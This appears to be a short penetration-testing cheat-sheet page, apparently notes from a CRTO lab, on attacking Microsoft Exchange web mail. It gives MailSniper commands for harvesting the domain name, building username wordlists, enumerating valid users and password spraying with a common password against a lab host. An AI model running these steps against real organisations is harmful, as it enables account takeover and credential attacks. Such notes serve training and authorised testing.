Microsoft Exchange and Office

Enumeration

Tool: hunter.io (obtain username Conventions)

PS> Import-Module .\MailSniper.ps1

#Enumerate NetBIOS
PS> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io

#Create wordlist from usernames
Intrusionz3r0X@htb[/crto]$ namehash.py names.txt > possible.txt
Intrusionz3r0X@htb[/crto]$ ./username-anarchy -i /home/ltnbob/names.txt 
Intrusionz3r0@htb[/crto]$ ./username-anarchy Jane Smith > jane_smith_usernames.txt

#Enumerate Valid Users
PS> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList possible.txt -OutFile valid.txt

#Perform spraying attack
Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList valid.txt -Password Password123!

PreviousPowershell Cheetsheet NextLinux Penetration Testing

Last updated 3 months ago